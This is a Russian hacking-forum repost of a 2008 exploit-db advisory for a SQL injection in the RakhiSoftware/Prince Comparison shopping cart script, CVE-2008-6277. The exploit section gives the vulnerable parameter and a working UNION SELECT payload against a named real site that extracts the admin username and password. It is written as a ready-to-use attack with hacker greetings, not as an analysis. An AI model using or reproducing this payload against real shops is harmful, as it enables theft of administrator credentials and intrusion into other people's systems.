Exploit RakhiSoftware Shopping Cart - SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
7250
Проверка EDB
  1. Пройдено
Автор
XADOS
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-6277
Дата публикации
2008-11-27
Код:
[â– ] Prince Comparison Script : Shopping card <= Rem0tE $ql Injection
 
>@.@<

> AuToR: XaDoS
> Contact M&: xados [at] hotmail [dot] it
> B§g: Remote Sql inJection
> SIte vuln: http://willscript.com/rjbike_new/index.php
 
>@.@<
 

 
[â– ] ExPL0iT:
 
|: http://www.example.com/product.php?category_id=1&subcategory_id=[$qL]
 
 
 
[■] D£M0:  
 
|: http://willscript.com/rjbike_new/product.php?category_id=1&subcategory_id=4 union select 1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from admin--
 
(you see the username and password of adm in the title of one product)
 
[â– ] Th4nKs::
 
\> str0ke </
\> OnlY me ( no help for this ) ;-) </

# milw0rm.com [2008-11-27]
 
Источник
www.exploit-db.com

Похожие темы